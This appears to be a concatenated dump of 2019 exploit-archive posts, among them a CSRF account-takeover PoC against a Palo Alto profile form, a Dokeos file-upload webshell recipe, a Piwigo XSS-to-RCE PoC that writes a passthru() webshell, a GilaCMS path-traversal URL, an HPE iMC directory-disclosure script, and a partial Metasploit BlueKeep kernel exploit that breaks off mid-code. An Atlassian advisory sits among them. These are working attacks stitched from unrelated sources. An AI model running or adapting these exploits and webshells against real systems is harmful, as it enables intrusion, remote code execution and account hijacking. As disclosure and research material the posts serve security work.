** Note : this vulnerability is already fixed by paloalto security team

# Exploit Title: Missing CSRF Token Leads to account full takeover (All
accounts can be hijacked)
# Google Dork: [N/A]
# Date: [JUl 23 2019]
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998
# Vendor Homepage:https://www.paloaltonetworks.com
# Software Link: N/A
# Version: [8.0]
# Tested on: [Parrot OS]
# CVE : [N/A]
# Acknowledgement:
https://www.paloaltonetworks.com/security-researcher-acknowledgement

summary
----------
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to
execute unwanted actions on a web application in which they're currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request.

Steps to generate
----------------------
>> Initially account should be authenticated

>> for testing purpose i changed email address ..and account was fully
takeover

if html files not works then follow this steps

>> go to profile setting

>> change your profile details

>> then intercept that request

>> then generate csrf poc and then try in browser..boom! account
cresdentials will be changed .


PoC
---

<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="
https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp"
method="POST">
<input type="hidden" name="utf8" value="✓" />
<input type="hidden" name="access_token" value="m5xw97v7uy63yqw7"
/>
<input type="hidden" name="capture_screen" value="editProfile" />
<input type="hidden" name="js_version" value="d445bf4" />
<input type="hidden" name="capture_transactionId"
value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />
<input type="hidden" name="form" value="editProfileForm" />
<input type="hidden" name="flow" value="customstandardflow" />
<input type="hidden" name="client_id"
value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />
<input type="hidden" name="redirect_uri"
value="http://localhost/" />
<input type="hidden" name="response_type" value="token" />
<input type="hidden" name="flow_version"
value="20190502085125375950" />
<input type="hidden" name="settings_version" value="" />
<input type="hidden" name="locale" value="en-US" />
<input type="hidden" name="recaptchaVersion" value="2" />
<input type="hidden" name="Salutation" value="" />
<input type="hidden" name="First_Name__c"
value="EMAIL_HIJACKED" />
<input type="hidden" name="Middle_Name__c" value="" />
<input type="hidden" name="Last_Name__c" value="test" />
<input type="hidden" name="suffix" value="" />
<input type="hidden" name="Email_Display_Name"
value="hpankajjj" />
<input type="hidden" name="Business_Email"
value="pankajTESTHIJACKED@yopmail.com" />
<input type="hidden" name="Personal_Email" value="" />
<input type="hidden" name="Business_Phone" value="9999999999" />
<input type="hidden" name="MobilePhone" value="" />
<input type="hidden" name="Company" value="AbeBooks" />
<input type="hidden" name="Title" value="" />
<input type="hidden" name="Job_Role__c"
value="Administrator" />
<input type="hidden" name="Job_Level__c" value="" />
<input type="hidden" name="Address1" value="" />
<input type="hidden" name="Address2" value="" />
<input type="hidden" name="City" value="" />
<input type="hidden" name="Zip_or_Postal_Code" value="" />
<input type="hidden" name="Country" value="India" />
<input type="hidden" name="Alt_State_Province__c"
value="" />
<input type="hidden" name="province" value="" />
<input type="hidden" name="Preferred_Communication" value="" />
<input type="hidden" name="language__c" value="en_US" />
<input type="hidden" name="location__c" value="India" />
<input type="hidden" name="BreachPrevention_hidden" value="" />
<input type="hidden" name="BYOD_hidden" value="" />
<input type="hidden" name="CloudSecurity_hidden" value="" />
<input type="hidden" name="Cybersecurity_hidden" value="" />
<input type="hidden" name="DataCenterVirtualization_hidden"
value="" />
<input type="hidden" name="EndpointSecurity_hidden" value="" />
<input type="hidden" name="Firewalls_hidden" value="" />
<input type="hidden" name="Mobility_hidden" value="" />
<input type="hidden" name="NetworkSecurity_hidden" value="" />
<input type="hidden" name="NetworkPerimeter_hidden" value="" />
<input type="hidden" name="NextGenerationFirewall_hidden"
value="" />
<input type="hidden" name="SaaSSecurity_hidden" value="" />
<input type="hidden" name="ThreatPrevention_hidden" value="" />
<input type="hidden"
name="subscribeToNewsAndProductUpdates_hidden" value="" />
<input type="hidden" name="subscribeToEventsAndWebinars_hidden"
value="" />
<input type="hidden"
name="subscribeToUnit42ThreatResearch_hidden" value="" />
<input type="hidden" name="tab1complete__c" value="true" />
<input type="hidden" name="tab2complete__c" value="false" />
<input type="hidden" name="tab3complete__c" value="false" />
<input type="hidden" name="tab4complete__c" value="false" />
<input type="hidden" name="tab5complete__c" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


THANK YOU

PANKAJ KUMAR THAKUR

INDP.Security Researcher | Certified Ethical Hacker | Red Team at SYNACK
Inc | OSCP

# Exploit Title: Dokeos 1.8.6.3 and 1.8.6.1- Arbitrary File Upload
# Google Dork: "Plateforme Dokeos 1.8.6.3 " or 1.8.6.1
# Date: 17/09/2019
# Exploit Author: Sohel Yousef Jellyfish security team
# Vendor Homepage: https://www.dokeos.com/
# Software Link: https://www.dokeos.com/
# Version: 1.8.6.3 - 1.8.6.1
# Tested on: kali linux
# CVE : N/A

# go to this dir to upload your file dokeos
1.8.6.3/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
# you can insert and upload files  rename your file to bel like
backdoor.php.gif
# and add this  GIF89;aGIF89;aGIF89;a   before <?PHP
# to be like this for examlple

GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
 $tgt_dir = "uploads/";
 $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
 echo "<br>TARGET FILE= ".$tgt_file;
 //$filename = $_FILES['fileToUpload']['name'];
 echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
 if(isset($_POST['submit']))
 {
 if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
    { echo "<br>file exists, try with another name"; }
 else   {
         echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
        { echo "<br>File UPLOADED:- ".$tgt_file; }

          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
    }
 }
?>
</body>
</html>

# upload the file and you can find your file here on this image browser
main/inc/lib/fckeditor/editor/plugins/ImageManager/images.php
# click and view the image / file you and will be here --->
dokeos/main/upload/users/0/my_files/.thumbs/.yourfile.php.gif
# remove .thumbs. to be like this
/main/upload/users/0/my_files/yourfile.php.gif
# and your file are ready
################################################################################################

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

This email refers to the advisory found at
https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-09-18-976171274.html


CVE ID:

* CVE-2019-14994.


Product: Jira Service Desk Server and Data Center.

Affected Jira Service Desk Server and Data Center product versions:

version < 3.9.16
3.10.0 <= version < 3.16.8
4.0.0 <= version < 4.1.3
4.2.0 <= version < 4.2.5
4.3.0 <= version < 4.3.4
4.4.0 <= version < 4.4.1


Fixed Jira Service Desk Server and Data Center product versions:

* for 3.9.x and earlier, Jira Service Desk Server and Data Center
3.9.16 has been released
with a fix for this issue.
* for 3.16.x, Jira Service Desk Server and Data Center 3.16.8 has been released
with a fix for this issue.
* for 4.1.x, Jira Service Desk Server and Data Center 4.1.3 has been released
with a fix for this issue.
* for 4.2.x, Jira Service Desk Server and Data Center 4.2.5 has been released
with a fix for this issue.
* for 4.3.x, Jira Service Desk Server and Data Center 4.3.4 has been released
with a fix for this issue.
* for 4.4.x, Jira Service Desk Server and Data Center 4.4.1 has been released
with a fix for this issue.


Summary:
This advisory discloses a critical severity security vulnerability. Versions of
Jira Service Desk Server and Data Center are affected by this vulnerability.

Customers who have upgraded Jira Service Desk Server and Data Center to version
3.9.16, 3.16.8, 4.1.3, 4.2.5, 4.3.4, or 4.4.1 are not affected.

Customers who have downloaded and installed affected versions of Jira Service
Desk Server and Data, please upgrade your Jira Service Desk Server
and Data Center installations immediately to fix this vulnerability.


URL path traversal allows information disclosure - CVE-2019-14994

Severity:
Atlassian rates the severity level of this vulnerability as critical, according
to the scale published in our Atlassian severity levels. The scale allows us to
rank the severity as critical, high, moderate or low.
This is our assessment and you should evaluate its applicability to your own IT
environment.


Description:

By design, Jira Service Desk gives customer portal users permissions only to
raise requests and view issues. This allows users to interact with the customer
portal without having direct access to Jira. These restrictions can be bypassed
by a remote attacker with portal access who exploits a path traversal
vulnerability. Exploitation allows an attacker to view all issues
within all Jira
projects contained in the vulnerable instance. This could include Jira Service
Desk projects, Jira Core projects, and Jira Software projects.

Note that attackers can grant themselves access to Jira Service Desk
portals that
have the 'Anyone can email the service desk or raise a request in the portal'
setting enabled. Changing this setting does not defend against an attacker that
has portal access via other means. Atlassian does not recommend changing the
setting. Instead, upgrade to a non-vulnerable version listed below.

Versions of Jira Service Desk Server and Data Center before 3.9.16 (the fixed
version for 3.9.x), from version 3.10.0 before 3.16.8 (the fixed version for
3.16.x), from version 4.0.0 before 4.1.3 (the fixed version for 4.1.x), from
version 4.2.0 before 4.2.5 (the fixed version for 4.2.x), from version 4.3.0
before 4.3.4 (the fixed version for 4.3.x), and from version 4.4.0 before 4.4.1
(the fixed version for 4.4.x) are affected by this vulnerability. This issue can
be tracked at: https://jira.atlassian.com/browse/JSDSERVER-6517.



Fix:

To address this issue, we've released the following versions containing a fix:

* Jira Service Desk Server and Data Center version 3.9.16
* Jira Service Desk Server and Data Center version 3.16.8
* Jira Service Desk Server and Data Center version 4.1.3
* Jira Service Desk Server and Data Center version 4.2.5
* Jira Service Desk Server and Data Center version 4.3.4
* Jira Service Desk Server and Data Center version 4.4.1

Remediation:

Upgrade Jira Service Desk Server and Data Center to version 4.4.1 or higher.

The vulnerabilities and fix versions are described above. If affected, you
should upgrade to the latest version immediately.

If you are running Jira Service Desk Server and Data Center 3.9.x and cannot
upgrade to 4.4.1, upgrade to version 3.9.16.
If you are running Jira Service Desk Server and Data Center 3.16.x and cannot
upgrade to 4.4.1, upgrade to version 3.16.8.
If you are running Jira Service Desk Server and Data Center 4.1.x and cannot
upgrade to 4.4.1, upgrade to version 4.1.3.
If you are running Jira Service Desk Server and Data Center 4.2.x and cannot
upgrade to 4.4.1, upgrade to version 4.2.5.
If you are running Jira Service Desk Server and Data Center 4.3.x and cannot
upgrade to 4.4.1, upgrade to version 4.3.4.


For a full description of the latest version of Jira Service Desk Server and
Data Center, see the release notes found at
https://confluence.atlassian.com/servicedesk/jira-service-desk-release-notes-780083086.html.
You can download the latest version of Jira Service Desk Server and Data Center
from the download centre found at
https://www.atlassian.com/software/jira/service-desk/download.



Support:
If you have questions or concerns regarding this advisory, please raise a
support request at https://support.atlassian.com/.


-----BEGIN PGP SIGNATURE-----

iQJLBAEBCAA1FiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAl2FBYoXHHNlY3VyaXR5
QGF0bGFzc2lhbi5jb20ACgkQJCCXorxSdqBMGw/8CxbSxu7zoB/0Z8AQ0MFZJyf/
0roBecinHPV8jV7/+LLUrU0fLvDvaw1hGnVPbNzWPrD8cMrOgI4VxIigTdFBwmwH
morZNBRk6d4h+xbuYjYvlATw97ClAfDsqUEwNSIxHn7Nwbt2rFn/a8+E9asG1oEY
WSnra6ibpwlNL5JMyggOT2Qu9/fC9BsZoFcRk1+z7fuMtd3Dh7ByCCu9eeIqLao2
sMAb0vE8PGmjXb6Uvy/2Vsp2+BtB4BS28/scxnssa/sKslI1XchWgZNk/2pYW9V9
1AIoSOapm2cP+4XmIq7ViWvAAPE6ViCdTfDTzQWw+UcNOa789zQXm7oagro3Fack
9iuDCISw48MjT/ZG1Fq1YrLutkcc3ekiLdjTB0hprQ51kfyRnyYwEUXWj1NRI+Wd
FEqQbDskLqFB1chroz0fiVpAmSN4VwNTo4QXnbSfiFcfROydwziGOPbHjlmAFxFh
1U6yjAoM3cZhCjnXvTDbiuPOTTry/VPYDOZ/I6gN2B5L7+sDGH0BGQaLKgnOHNcz
oizi0PxHTu7C4yT/e3G0lJDcWu5isGIE98Jd3fW7rC0wMrsCDLog9WscLam4fhYi
SADWs4t6IXGM/kEwGpjejIJMbeSVg3kEuGzr4fOxxkgkYMnrku3Cfi1orgfBiTFZ
tU9ucg9A6BDluQUVaCc=
=jYqK
-----END PGP SIGNATURE-----

###########################################################################
                     ______      ____________          __  
                    / ____/_  __/ / __/_  __/__  _____/ /_ 
                   / / __/ / / / / /_  / / / _ \/ ___/ __ \
                  / /_/ / /_/ / / __/ / / /  __/ /__/ / / /         
                  \____/\__,_/_/_/   /_/  \___/\___/_/ /_/ 

                      GulfTech Research and Development                                                                 

###########################################################################
#                 Piwigo <= 2.9.5 Multiple Vulnerabilities                #            
###########################################################################


Released Date: 2019-09-22
Last Modified: 2019-09-22
 Company Info: Piwigo.org
 Version Info: 
              Vulnerable
               Piwigo <= 2.9.5


--[ Table of contents

00 - Introduction
    00.1 Background

01 - Cross Site Scripting
    01.1 - Vulnerable code analysis
    01.2 - Remote exploitation

02 - SQL Injection
    02.1 - Vulnerable code analysis
    02.2 - Remote exploitation

03 - Credit

04 - Solution

05 - Contact information


--[ 00 - Introduction

The purpose of this article is to detail the vulnerabilities that I found 
in the Piwigo software. 


--[ 00.1 - Background

Piwigo is a popular open source photo gallery application written in PHP.


--[ 01 - Cross Site Scripting

Piwigo is vulnerable to a XSS issue within the "permalinks" functionality. 
This vulnerability can be exploited by an attacker to execute arbitrary 
client side code within the context of the victim client.

--[ 01.1 - Vulnerable code analysis

The vulnerable code can be found within the "parse_sort_variables" function
which is located in admin/permalinks.php and is as follows:

$url_components = parse_url( $_SERVER['REQUEST_URI'] );

$base_url = $url_components['path'];

parse_str($url_components['query'], $vars);
$is_first = true;
foreach ($vars as $key => $value)
{
  if (!in_array($key, $get_rejects) and $key!=$get_param)
  {
    $base_url .= $is_first ? '?' : '&';
    $is_first = false;
    $base_url .= $key.'='.urlencode($value);
  }
}

As we can see from the above code, the user supplied "REQUEST_URI" server
variable is used to build the $base_url variable which is later displayed
as a link to the end user. The problem with this code is that value data is
urlencoded, but key data is unasanitized. This leads to a reflected XSS
condition which could allow an attacker to force an authenticated admin
user to perform malicious actions silently on the attackers behalf.

--[ 01.2 - Remote exploitation

The Javascript payload that I created was able to create a web shell on the 
remote host by taking the following steps once executed by an authenticated 
administrator.

1] Gather "pwg_token" CSRF token
2] Install LocalFilesEditor plugin
3] Activate plugin
4] Write shell to /local/config/config.inc.php
5] De activate plugin
6] Uninstall plugin
7] Redirect user to the index page

Exploitation of this issue is rather straight forward, but because 
variables in PHP can't have dots and spaces in their names so those are 
converted to underscores by the call to "parse_str" in the vulnerable code
shown earlier. An attacker must adhere to these limitations whenever
constructing XSS payloads. 


--[ 02 - SQL Injection

Piwigo is vulnerable to an SQL Injection issue within the "permalinks"
functionality. This vulnerability can be exploited by an attacker to execute 
arbitrary SQL statements.

--[ 02.1 - Vulnerable code analysis

The vulnerable code can be found located in the admin/permalinks.php file and is 
as follows:

if ( isset($_POST['set_permalink']) and $_POST['cat_id']>0 )
{
  check_pwg_token();
  $permalink = $_POST['permalink'];
  if ( empty($permalink) )
    delete_cat_permalink($_POST['cat_id'], isset($_POST['save']) );
  else
    set_cat_permalink($_POST['cat_id'], $permalink, isset($_POST['save']) );
  $selected_cat = array( $_POST['cat_id'] );
}

Both the "set_cat_permalink" and "delete_cat_permalink" functions rely on the 
"cat_id" variable already being sanitized. However, the only sanity checks that
take place with "cat_id" are to make sure it is greater than zero. This is not
sufficient as PHP type juggling will cast a string that starts with a number to 
a valid integer for the comparison, yet the original tainted value will remain.
This allows an attacker to pass a string that starts with an integer in order to
achieve SQL Injection.

--[ 02.2 - Remote exploitation

It seems an admin account is required to exploit this issue, so I did not bother
with trying to write an exploit for this issue.

--[ 03 - Credit

James Bercegay
GulfTech Research and Development


--[ 04 - Solution

The issue is addressed with the following commit.

https://github.com/Piwigo/Piwigo/commit/7e154ab093546e5288221685c1f8bfec2382d09a

This is scheduled for release 2.10.0.RC2


--[ 05 - Contact information

Web
https://gulftech.org/

Mail
security@gulftech.org


Copyright 2019 GulfTech Research and Development. All rights reserved.


---------------------------------------------------------------
2019_piwigo_permalinks_xss_to_rce.php Proof of Concept exploit:

<?php
////////////////////////////////////////////////////////////////////////////////
// Piwigo <= 2.9.5 XSS to RCE Proof of Concept 
// James Bercegay ( http://www.gulftech.org/ )
////////////////////////////////////////////////////////////////////////////////

// Start output buffering for JavaScript content
ob_start();
?>
// BEGIN JAVASCRIPT

// CSRF protection token
var pwg = document.forms[0].pwg_token.value;

// Webshell PHP code
var php = "passthru(urldecode($_REQUEST['x']));";

// LocalFilesEditor version info
var rev = "6861";
var ext = "144";

// Build URL
var url = "admin.php?page=plugins&tab=new&revision=" +
       rev +
"&extension=" +
      ext +
"&pwg_token=" + pwg;

// Install plugin
$.ajax({
    async: false,
    type: "GET",
    url: url
});

// Build URL
var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" + 
       pwg + 
"&action=activate";

// Activate plugin
$.ajax({
    async: false,
    type: "GET",
    url: url,
    success: function (response) {

      // Build URL
    var url = "admin.php?page=plugin-LocalFilesEditor-localconf";

    // Keep space at the beginning of php payload. It's intentional.
    $.post( url, { pwg_token: pwg, text: "" + php, submit: "1" } );

}});

// Build URL
var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" + 
       pwg + 
"&action=deactivate";

// De Activate plugin
$.ajax({
    async: false,
    type: "GET",
    url: url
});

// Build URL
var url = "admin.php?page=plugins&plugin=LocalFilesEditor&pwg_token=" +
       pwg + 
"&action=delete";

// Uninstall plugin 
$.ajax({
    async: false,
    type: "GET",
    url: url
});

// Redirect user
document.location = "admin.php";

// ENDED JAVASCRIPT
<?php

// Encode contents using base64 encoding. We do this because PHP strips certain 
// characters from key values, and will prevent loading javascript containing a 
// dot for example.
$b64 = base64_encode(ob_get_clean());

// Formatted URL
$url = '/admin.php?page=permalinks&"><script>eval(atob("%s"));</script><a+"=1';

// Output
printf($url, urlencode($b64));
printf("\nSend the above URL to a logged in administrator.");
printf("\nShell will be located at: local/config/config.inc.php");
?>

# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Date: 04-08-2019
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679

*********** *Steps to reproduce the Vulnerability* *************

Login into the application as an admin user or equivalent user and go the
below link

http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts

################################################################

#!/opt/local/bin/python2.7

# Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure
# Date: 22-09-2019
# Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win
# Tested on: Windows 7
# CVE : CVE-2019-5392
# Conversion of Nessus Plugin to Python Exploit
# Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl
# Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user.
# See Also: https://www.tenable.com/plugins/nessus/118038

from pyasn1.type.univ import *
from pyasn1.type.namedtype import *
from pyasn1.codec.ber import encoder
import struct
import binascii
import socket, sys
import sys
import re

if len(sys.argv) != 4:
    print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0])
    sys.exit(1)
else:
    ip = sys.argv[1]
    port = int(sys.argv[2]) # Default Port 2810
    directory = sys.argv[3]
    payload = directory.replace("\\","\\\\") 
    opcode = 10001

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Socket Created.."
except socket.error:
print 'Failed to create socket'
sys.exit()
victim_address = (ip,port)
print('connecting to {} port {}'.format(*victim_address))
sock.connect((ip, port))

class DbmanMsg(Sequence):
    componentType = NamedTypes(
        NamedType('flag', Integer()),
        NamedType('dir', OctetString())
    )

data = DbmanMsg()
data['flag'] = 1
data['dir'] = payload
encodeddata = encoder.encode(data, defMode=False)
dataLen = len(encodeddata)
values = (opcode, dataLen, encodeddata)
s = struct.Struct(">ii%ds" % dataLen)
packed_data = s.pack(*values)
print 'Format string  :', s.format
print 'Uses           :',s.size, 'bytes'
print 'Packed Value   :', binascii.hexlify(packed_data)
print '\n'
print 'Sending Payload...'
sock.send(packed_data)
BUFF_SIZE = 4000
res = sock.recv(BUFF_SIZE)
rec =  len(res)
if (rec == 0):
print "No data in the directory"
else:
        print "Data Recived: "+str(rec)
a = repr(res)
b = a
b = re.sub(r'(x\d\d)', '', b)
b = re.sub(r'(\\x[\d].)', '', b)
b = re.sub(r'(\\x..)', '', b)
replacestring = ['"','\\n','\\r','\\t','0']
print "Data in "+payload+" Directory: \n"
for r in replacestring:
b = b.replace(r,'')
b = b.replace("'","")
#print b #Remove '#' if output results is not proper
matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):

print match.group(2)
print "Done..."
sock.close()

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#  Exploitation and Caveats from zerosum0x0:
#
#    1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.
#    2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)
#    3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.
#    4. RDP has chunked messages, so we use this to groom.
#       a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.
#       b. However, on 7+, MS_T120 will not work and you have to use RDPSND.
#           i. RDPSND only works when
#              HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
#           ii. This registry key is not a default setting for server 2008 R2.
#              We should use alternate groom channels or at least detect the
#              channel in advance.
#    5. Use chunked grooming to fit new data in the freed channel, account for
#       the allocation header size (like 0x38 I think?). At offset 0x100? is where
#       the "call [rax]" gadget will get its pointer from.
#       a. The NonPagedPool (NPP) starts at a fixed address on XP-7
#           i. Hot-swap memory is another problem because, with certain VMWare and
#           Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP
#           start. This can be anywhere from 100 mb to gigabytes of offset
#           before the NPP start.
#       b. Set offset 0x100 to NPPStart+SizeOfGroomInMB
#       c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need
#          [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an
#          indirect call
#       d. We are limited to 0x400 payloads by channel chunk max size. My
#          current shellcode is a twin shellcode with eggfinders. I spam the
#          kernel payload and user payload, and if user payload is called first it
#          will egghunt for the kernel payload.
#    6. After channel hole is filled and the NPP is spammed up with shellcode,
#       trigger the free by closing the socket.
#
#    TODO:
#    * Detect OS specifics / obtain memory leak to determine NPP start address.
#    * Write the XP/2003 portions grooming MS_T120.
#    * Detect if RDPSND grooming is working or not?
#    * Expand channels besides RDPSND/MS_T120 for grooming.
#        See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/
#
#    https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming
#    MS_T120 on XP... should be same process as the RDPSND

class MetasploitModule < Msf::Exploit::Remote

  Rank = ManualRanking

  USERMODE_EGG = 0xb00dac0fefe31337
  KERNELMODE_EGG = 0xb00dac0fefe42069

  CHUNK_SIZE = 0x400
  HEADER_SIZE = 0x48

  include Msf::Exploit::Remote::RDP
  include Msf::Exploit::Remote::CheckScanner

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',
'Description'    => %q(
        The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,
        allowing a malformed Disconnect Provider Indication message to cause use-after-free.
        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
        the freed channel is used to achieve arbitrary code execution.
      ),
'Author' =>
      [
'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0 - Original exploit
'Ryan Hanson',                              # @ryHanson - Original exploit
'OJ Reeves <oj@beyondbinary.io>',           # @TheColonial - Metasploit module
'Brent Cook <bcook@rapid7.com>',            # @busterbcook - Assembly whisperer
      ],
'License' => MSF_LICENSE,
'References' =>
        [
          ['CVE', '2019-0708'],
          ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
        ],
'DefaultOptions' =>
        {
'EXITFUNC' => 'thread',
'WfsDelay' => 5,
'RDP_CLIENT_NAME' => 'ethdev',
'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
        },
'Privileged' => true,
'Payload' =>
        {
'Space' => CHUNK_SIZE - HEADER_SIZE,
'EncoderType' => Msf::Encoder::Type::Raw,
        },
'Platform' => 'win',
'Targets' =>
        [
          [
'Automatic targeting via fingerprinting',
            {
'Arch' => [ARCH_X64],
'FingerprintOnly' => true
            },
          ],
          #
          #
          # Windows 2008 R2 requires the following registry change from default:
          #
          # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
          # "fDisableCam"=dword:00000000
          #
          [
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
            {
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8003800000,
'GROOMSIZE' => 100
            }
          ],
          [
            # This works with Virtualbox 6
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',
            {
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8002407000
            }
          ],
          [
            # This address works on VMWare 14
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',
            {
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8030c00000
            }
          ],
          [
            # This address works on VMWare 15
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',
            {
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8018C00000
            }
          ],
          [
            # This address works on VMWare 15.1
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',
            {
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8018c08000
            }
          ],
          [
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
            {
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8102407000
            }
          ],
          [
'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',
            {
'Platform' => 'win',
'Arch' => [ARCH_X64],
'GROOMBASE' => 0xfffffa8018c08000
            }
          ],
        ],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 14 2019',
'Notes' =>
        {
'AKA' => ['Bluekeep']
        }
    ))

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [false, 'Override check result', false]),
        OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
        OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
        OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
      ]
    )
  end

  def exploit
    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    if target['FingerprintOnly']
      fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')
    end

    begin
      rdp_connect
    rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
      fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
    end

    is_rdp, server_selected_proto = rdp_check_protocol
    unless is_rdp
      fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
    end

    # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us
    # from exploiting the target.
    if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)
      fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')
    end

    chans = [
      ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],
      [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
      [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
      ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
      ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
